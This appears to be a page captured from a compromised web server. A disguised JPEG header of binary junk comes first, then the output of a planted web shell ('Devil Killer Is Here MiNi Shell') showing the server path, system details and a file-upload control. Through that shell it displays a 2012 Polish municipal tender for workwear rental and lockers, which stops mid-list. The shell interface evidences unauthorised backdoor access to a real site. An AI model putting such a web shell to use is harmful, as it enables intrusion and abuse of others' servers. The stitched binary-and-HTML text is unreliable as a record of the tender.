JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121005/383380-N-2012.html

<p class="kh_header"><b>Nowa Sól: Wynajem i serwis odzieży roboczej oraz szafek na odzież roboczą</b><br>
<b>Numer ogłoszenia: 383380 - 2012; data zamieszczenia: 05.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Komunalnej spółka z ograniczoną odpowiedzialnością w Nowej Soli , ul. Konstruktorów 2, 67-100 Nowa Sól, woj. lubuskie, tel. 068 478 51 10, faks 068 478 51 11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem i serwis odzieży roboczej oraz szafek na odzież roboczą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowa usługa wynajmu oraz serwisowania odzieży roboczej 
i szafek na odzież roboczą, (zgodnie z ogólnie obowiązującymi w tym zakresie przepisami i normami) będącej własnością Wykonawcy .
2. Odzież będąca własnością Wykonawcy: ( kosztorys cenowy -   załącznik nr 2 )
2.1. Poszczególni pracownicy będą posiadali na wyposażeniu odpowiednio:
a) w okresie letnim obejmującym miesiące: kwiecień, maj, czerwiec, lipiec, sierpień, wrzesień, październik (7 m - cy  x 3 okresy - 21 miesięcy )
Czapka letnia z daszkiem  - 2 szt.
Bluza robocza - 3 szt.
Bluza robocza z taśmami ostrzegawczymi  - 3 szt.
Koszulka  polo   - 3 szt.
Spodnie robocze ogrodniczki  - 3 szt.
Spodnie robocze ogrodniczki z taśmami ostrzegawczymi - 3 szt.
Po upływie okresu letniego użytkowania, odzież zostanie przekazana do depozytu Wykonawcy, który nie będzie pobierał wynagrodzenia za wynajem i serwis, zgodnie z ilością  wyspecyfikowaną w załączniku nr 2
b) w okresie zimowym obejmującym miesiące: styczeń, luty, marzec, listopad, grudzień (5 m - cy x 3 okresy = 15 miesięcy )
Czapka zimowa  -  2 szt.
Koszula flanelowa - 3 szt.
Kurtka ocieplana    - 3 szt.
Kurtka ocieplana z taśmami ostrzegawczymi  - 3 szt.
Ocieplacz - 2 szt.
Ocieplacz z taśmami ostrzegawczymi    - 2 szt.
Spodnie robocze ogrodniczki  ocieplane - 3 szt.
Spodnie robocze ogrodniczki ocieplane z taśmami ostrzegawczymi - 3 szt.
Po upływie okresu zimowego użytkowania, odzież zostanie przekazana do depozytu Wykonawcy, który nie będzie pobierał wynagrodzenia za wynajem i serwis zgodnie z ilością wyspecyfikowaną w załączniku nr 2
c)w okresie całorocznym
Fartuch ochronny biały - 2 szt.
2.2 Wybarwienie odzieży będzie następujące: niebieskie lub pomarańczowe. Odzież w poszczególnych kolorach będzie przydzielana pracownikom zatrudnionym w poszczególnych działach zgodnie z załącznikiem  nr 2 oraz opisem sortów w ilości 30 sztuk z taśmami ostrzegawczymi w kolorze pomarańczowym lub niebieskim i 39 sztuk w kolorze niebieskim.
2.3 Wskazane miesiące oraz sorty do rozpoczęcia użytkowania odzieży w okresie letnim bądź w zimowym mogą ulec zmianie, a uzależnione to będzie od istniejących warunków atmosferycznych i na wcześniejsze zgłoszenie Zamawiającego Wykonawca dostarczy wymaganą odzież.
2.4 Identyfikator na tkaninie powinien zawierać, co najmniej następujące informacje:
1.imię i nazwisko użytkownika (pracownika Zamawiającego)
2.nazwę firmy,
3.datę dostarczenia odzieży,
4.miejsce dostarczenia odzieży,
5.numer kompletu odzieży, 
6.numer przydzielonej szafki na odzież czystą.
3. Wykonawca w ramach świadczonej usługi zapewnia  transport, pranie, dezynfekcję, prasowanie lub brak zagnieceń zgodnie z technologią Wynajmującego, naprawę odzieży, wymianę odzieży zużytej w wyniku eksploatacji oraz zniszczonej.
4. Odzież będzie odbierana i dostarczana transportem Wykonawcy na jego koszt oraz umieszczana 
w dzierżawionych szafkach (odzież czysta oddzielnie dla każdego pracownika, odzież brudna 
w szafce wrzutowej - zbiorczej) raz w tygodniu w ustalonym i stałym dniu tygodnia.
5. Wynajem szaf wrzutowych w ilości umożliwiającej zbiorcze przechowywanie odzieży brudnej oraz szaf ubraniowych zamykanych na klucze, pojedynczo dla każdego pracownika, do przechowywania odzieży czystej w miejscach wyznaczonych przez Zamawiającego.
6. Ilość szaf musi odpowiadać ilości zatrudnionych pracowników w zakładzie. Szafy powinny być nowe z możliwością ich oznaczenia imieniem i nazwiskiem użytkującego pracownika na drzwiach (frontowej części) szafy. Oznaczenie powinno być wymienne.
7. W przypadku zmiany liczby zatrudnienia pracowników, Wykonawca ma obowiązek dostosowania ilości szafek z odzieżą do faktycznych potrzeb.
8. Wykonawca po podpisaniu umowy z Zamawiającym otrzyma wykaz imienny zatrudnionych pracowników.
9. Wykonawca jest zobowiązany do dokonania pomiarów pracowników w celu dostarczenia odzieży we właściwych rozmiarach w terminie do 7 dni od dnia podpisania umowy lub zgłoszenia nowego pracownika.
10. Wykonawca pierwszą dostawę odzieży dla Zamawiającego zobowiązuje się zrealizować w terminie do 30 dni od dnia dokonania pomiarów pracowników.
11. Wykonawca ponosi odpowiedzialność materialną za utratę lub uszkodzenie przekazanej mu do serwisowania odzieży oraz do przechowywania od chwili przekazania do chwili jej zwrotu, a w przypadku utraty odzieży z winy Wykonawcy, dostarcza Zamawiającemu nową sztukę takiej samej odzieży i nie nalicza od początku amortyzacji.
12. Wykonawca jest zobowiązany raz w miesiącu, w załączeniu do faktury VAT, przedstawić szczegółowy raport dostaw, zawierający informację o rotacji odzieży, stanu ilościowego oraz faktycznego obiegu poszczególnych sztuk dostarczonej odzieży.
13. Wykonawca dostosuje ilość odzieży do zmian w zatrudnieniu Zamawiającego w trakcie trwania umowy.
14. Zamawiający zastrzega sobie możliwość zmniejszenia / zwiększenia wolumenu przedmiotu zamówienia o 5 % łącznej ilości zatrudnionych pracowników. 
Opis sortów odzieżowych
1.Bluza robocza typu szwedzkiego - kolor niebieski.
Informacje techniczne:
skład surowcowy: 65% poliester, 35% bawełna,
gramatura: min 245 g/m2.
wybarwienie tkaniny: niebieskie ( nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania )
Informacje szczegółowe:
bluza męska do pasa, rozpinana z przodu,
zapinana na kryte napy, 
dwie kieszenie piersiowe,
rękawy wykończone obwodem, zapinane na napy,
dół wykończony paskiem z regulacją - gumką po bokach,
podkrój szyjny wykończony kołnierzem,
nad lewą kieszenią piersiową i na plecach wykonane techniką haftu LOGO Zamawiającego (przód: max rozmiar 5 cm x 10 cm / tył: max rozmiar 10 cm x 25 cm)
dostępne rozmiary: S - XXL
oznaczenie CE
zgodnie z normą: PN-P-84525: 1998 / Odzież robocza. Ubranie robocze
identyfikator
2.Bluza robocza typu szwedzkiego - kolor niebieski lub pomarańczowy z taśmami odblaskowymi 3M.
Informacje techniczne:
skład surowcowy: 65% poliester, 35% bawełna,
gramatura: min 245 g/m2.
wybarwienie tkaniny: niebieskie lub pomarańczowe ( nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania )
Informacje szczegółowe:
bluza męska do pasa, rozpinana z przodu,
zapinana na kryte napy, 
dwie kieszenie piersiowe,
rękawy wykończone obwodem, zapinane na napy,
dół wykończony paskiem z regulacją - gumką po bokach,
podkrój szyjny wykończony kołnierzem,
taśmy odblaskowe 3M o szerokości 5 cm wszyte na dolnej części rękawów ,
nad lewą kieszenią piersiową i na plecach wykonane techniką haftu LOGO Zamawiającego (przód:  max rozmiar 5 cm x 10 cm / tył: max rozmiar 10 cm x 25 cm)
dostępne rozmiary: S - XXL
oznaczenie CE
zgodnie z normą: PN-P-84525: 1998 / Odzież robocza. Ubranie robocze
identyfikator
3.Spodnie robocze typu ogrodniczki - kolor niebieski.
Informacje techniczne:
skład surowcowy: 65% poliester, 35% bawełna,
gramatura: min 245 g/m2.
wybarwienie tkaniny: niebieskie ( nie ulegające odbarwieniu przez co najmniej 12 miesięcy  użytkowania )
Informacje szczegółowe:
spodnie rozpinane z boku z regulacją obwodu pasa,
na bawecie kieszeń kryta plisą zapinaną na napy,
dwie kieszenie przednie, jedna kieszeń tylna oraz kieszeń miarowa na prawej nogawce,
rozporek zapinany na zamek,
z tyłu guma dopasowująca,
elastyczne, regulowane szelki zapinane na plastikowe klamerki,
oznaczenie CE 
zgodnie z normą: PN-P-84525: 1998 / Odzież robocza. Ubranie robocze
na kieszeni znajdującej się na bawecie wykonane techniką haftu LOGO Zamawiającego (przód: max  rozmiar 5 cm x 10 cm)
dostępne rozmiary: S - XXL
identyfikator 
4.Spodnie robocze typu ogrodniczki - kolor niebieski lub pomarańczowy z taśmami odblaskowymi 3M.
Informacje techniczne:
skład surowcowy: 65% poliester, 35% bawełna,
gramatura: min 245 g/m2.
wybarwienie tkaniny: niebieskie lub pomarańczowe nie ulegające odbarwieniu przez co najmniej   12 miesięcy użytkowania.
Informacje szczegółowe:
spodnie rozpinane z boku z dwustopniową regulacją obwodu pasa,
na bawecie kieszeń kryta plisą zapinaną na napy,
dwie kieszenie przednie, jedna kieszeń tylna oraz kieszeń miarowa na prawej nogawce,
rozporek zapinany na zamek,
z tyłu guma dopasowująca,
elastyczne, regulowane szelki zapinane na plastikowe klamerki,
oznaczenie CE 
zgodnie z normą: PN-P-84525: 1998 / Odzież robocza. Ubranie robocze
taśmy odblaskowe 3M o szerokości 5 cm na dolnej części nogawek, 
na kieszeni znajdującej się na bawecie wykonane techniką haftu LOGO Zamawiającego (przód: max.  rozmiar 5 cm x 10 cm),
dostępne rozmiary: S - XXL,
identyfikator 
5.Spodnie robocze ocieplane typu ogrodniczki - kolor niebieski.
Informacje techniczne:
skład surowcowy: 65% poliester, 35% bawełna,
gramatura: min 245 g/m2.
wybarwienie tkaniny: niebieskie ( nie ulegające odbarwieniu przez co najmniej 12 miesięcy  użytkowania )
Informacje szczegółowe:
spodnie wykonane z tkaniny wodoodpornej, rozpinane na  boku z regulacją obwodu pasa,
na bawecie kieszeń kryta patką zapinaną na rzep,
dwie kieszenie przednie, 
rozporek zapinany na zamek,
z tyłu guma dopasowująca,
elastyczne, regulowane szelki zapinane na plastikowe klamerki,
oznaczenie CE 
taśmy odblaskowe 3M o szerokości 5 cm na dolnej części nogawek, 
na kieszeni znajdującej się na bawecie wykonane techniką haftu LOGO Zamawiającego (przód: max. rozmiar 5 cm x 10 cm)
dostępne rozmiary: S - XXL
identyfikator
6.Spodnie robocze ocieplane typu ogrodniczki - kolor niebieski lub pomarańczowy z taśmami odblaskowymi 3M.
Informacje techniczne:
skład surowcowy: 70% poliester, 30% bawełna,
gramatura: min 230 g/m2,
wybarwienie tkaniny: niebieskie lub pomarańczowe nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania .
Informacje szczegółowe:
spodnie wykonane z tkaniny wodoodpornej, rozpinane na  boku z regulacją obwodu pasa,
na bawecie kieszeń kryta patką zapinaną na rzep,
dwie kieszenie przednie, 
rozporek zapinany na zamek,
z tyłu guma dopasowująca,
elastyczne, regulowane szelki zapinane na plastikowe klamerki,
oznaczenie CE 
taśmy odblaskowe 3M o szerokości 5 cm na dolnej części nogawek, 
na kieszeni znajdującej się na bawecie wykonane techniką haftu LOGO Zamawiającego (przód: max.  rozmiar 5 cm x 10 cm),
dostępne rozmiary: S - XXL,
identyfikator
7.Kurtka ocieplana długa - kolor niebieski
Informacje techniczne:
skład surowcowy: 70% poliester, 30% bawełna,
gramatura: 230 g/m2 
wybarwienie tkaniny: niebieskie nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania.
Informacje szczegółowe:
zapinana na zamek błyskawiczny, kryty plisą,
dwie kieszenie piersiowe, dwie podwójne kieszenie dolne kryte patkami na zatrzaski,
jedna kieszeń wewnętrzna zapinana na zamek,
kieszeń  na  rękawie,
ściągacze w rękawach,
w pasie i na dole tunel ze sznurkiem do regulacji obwodu,
dopinany kaptur,
dostępne rozmiary: S - XXL
zgodność z normą: ENV 342:1998 Odzież chroniąca  przed zimnem, 
nad lewą kieszenią piersiową i na plecach wykonane techniką haftu LOGO Zamawiającego (przód:  max rozmiar 5 cm x 10 cm / tył: max rozmiar 10 cm x 25 cm)
identyfikator
8.Kurtka ocieplana długa - kolor niebieski lub pomarańczowy z taśmami odblaskowymi 3M.
Informacje techniczne:
skład surowcowy: 70% poliester, 30% bawełna,
gramatura: 230 g/m2.
wybarwienie tkaniny: niebieskie lub pomarańczowe  nie ulegające odbarwieniu przez co najmniej  12 miesięcy użytkowania.
Informacje szczegółowe:
zapinana na zamek błyskawiczny, kryty plisą,
dwie kieszenie piersiowe, dwie podwójne kieszenie dolne kryte patkami na zatrzaski,
jedna kieszeń wewnętrzna zapinana na zamek,
kieszeń  na rękawie,
ściągacze w rękawach,
w pasie i na dole tunel ze sznurkiem do regulacji obwodu, 
dopinany kaptur,
dostępne rozmiary: S - XXL
zgodność z normą: ENV 342:1998 Odzież chroniąca przed zimnem, 
nad lewą kieszenią piersiową i na plecach wykonane techniką haftu LOGO Zamawiającego (przód:  max rozmiar 5 cm x 10 cm / tył: max rozmiar 10 cm x 25 cm)
na dole kurtki oraz nad końcami rękawów kurtki naszyte taśmy odblaskowe 3M 
o szerokości 5 cm.
identyfikator
9.Ocieplacz  - kolor niebieski
Informacje techniczne:
skład surowcowy: 70% poliester, 30% bawełna,
gramatura: 230 g/m2.
wybarwienie tkaniny: niebieskie ( nie ulegające odbarwieniu przez co najmniej 12 miesięcy  użytkowania)
Informacje szczegółowe:
zapinany na zamek błyskawiczny, kryty plisą,
dwie kieszenie piersiowe, dwie podwójne kieszenie dolne kryte patkami na zatrzaski,
jedna kieszeń wewnętrzna zapinana na zamek,
na dole tunel ze sznurkiem do regulacji obwodu,
dostępne rozmiary: S - XXL
zgodność z normą: ENV 342:1998 Odzież chroniąca  przed zimnem, 
nad lewą kieszenią piersiową i na plecach wykonane techniką haftu LOGO Zamawiającego (przód:  max rozmiar 5 cm x 10 cm / tył: max rozmiar 10 cm x 25 cm)
identyfikator
10.Ocieplacz  - kolor niebieski lub pomarańczowy z taśmami odblaskowymi 3M.
Informacje techniczne:
skład surowcowy: 70% poliester, 30% bawełna,
gramatura: 230 g/m2.
wybarwienie tkaniny: niebieskie lub pomarańczowe  nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania )
Informacje szczegółowe:
zapinany na zamek błyskawiczny, kryty plisą,
dwie kieszenie piersiowe, dwie podwójne kieszenie dolne kryte patkami na zatrzaski,
jedna kieszeń wewnętrzna zapinana na zamek,
na dole tunel ze sznurkiem do regulacji obwodu,
dostępne rozmiary: S - XXL
zgodność z normą: ENV 342:1998 Odzież chroniąca przed zimnem, 
nad lewą kieszenią piersiową i na plecach wykonane techniką haftu LOGO Zamawiającego (przód: max rozmiar 5 cm x 10 cm / tył: max rozmiar 10 cm x 25 cm)
na dole ocieplacza  naszyte taśmy odblaskowe 3M o szerokości 5 cm.
identyfikator
11.Koszulka typu polo
wybarwienie: niebieskie
gatunek I, wyprodukowana w Polsce,
materiał: 50 % bawełna, 50 % poliester gramatura - nie mniej niż 180 g/m2,
krótki rękaw,
na piersiach i plecach wykonane techniką haftu LOGO Zamawiającego ( przód:  max rozmiar  5 cm x  10 cm tył: max rozmiar 10 cm x 25 cm)  
dostępne rozmiary: S - XXL
oznaczenie CE.
Identyfikator
12.Koszula flanelowa robocza
wybarwienie:  niebiesko - czarna  krata
gatunek I, wyprodukowana w Polsce,
materiał: 100% bawełna, gramatura - nie mniej niż 180 g/m2,
zapinana na napy/guziki
jedna  kieszeń zewnętrzna na piersi,
dostępne rozmiary: S - XXL
oznaczenie CE,
zgodnie z normą: PN-92-9-84683 Odzież robocza. Koszule męskie
identyfikator
13.Czapka letnia z daszkiem
materiał: 65% poliester, 35% bawełna, gramatura 245 g/m2,
wybarwienie: niebieskie  nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania,
z tyłu regulacja obwodu czapki na rzep, 
otwory wentylacyjne,
w części czołowej nad daszkiem wykonane techniką haftu logo Zamawiającego, wg wzoru LOGO  (przód:  max  rozmiar 5 cm x 10 cm)
dostępne rozmiary: S - XXL
identyfikator
14.Czapka ocieplana zimowa
skład: 65% poliestr, 35% bawełna,
wybarwienie: niebieskie ( nie ulegające odbarwieniu przez co najmniej 12 miesięcy użytkowania)
gramatura: min 245 g/m2,
daszek usztywniony, nauszniki wiązane pod szyją,
w części czołowej nad daszkiem wykonane techniką haftu logo Zamawiającego, wg wzoru LOGO  (przód:  max  rozmiar 5 cm x 10 cm)
dostępne rozmiary: S - XXL
zgodnie z Dyrektywą Rady 89/686/EWG/ Rozporządzenia Ministra Gospodarki z dnia 21 grudnia  2005 r.
Identyfikator
15.Szafka na odzież czystą
szafka metalowa, 10-cio komorowa lub inne,
oznakowana personalnie dla pracowników,
zamykana dodatkowo na centralny klucz.
16.Szafka na odzież brudną
szafka metalowa,
kieszeń zapadkowa wrzutowa w górnej części, 
zamykana dodatkowo na centralny klucz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 50.83.00.00-2, 98.31.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przetargowego w wysokości  7.000,00 zł
( siedem tysięcy złotych 00/100 ).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz co najmniej 2 wykonanych usług a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg wzoru stanowiącego załącznik nr 5 do SIWZ oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie np. referencje.
atesty Państwowego Zakładu Higieny (PZH) na środki chemiczne dopuszczone do prania odzieży roboczej informujące, iż stosowane preparaty nie stwarzają zagrożeń dla życia i zdrowia użytkownika;
oświadczenie, że prana odzież będzie poddawana procesowi dezynfekcji (usunięcia wirusów, bakterii i mikroorganizmów).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej , zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

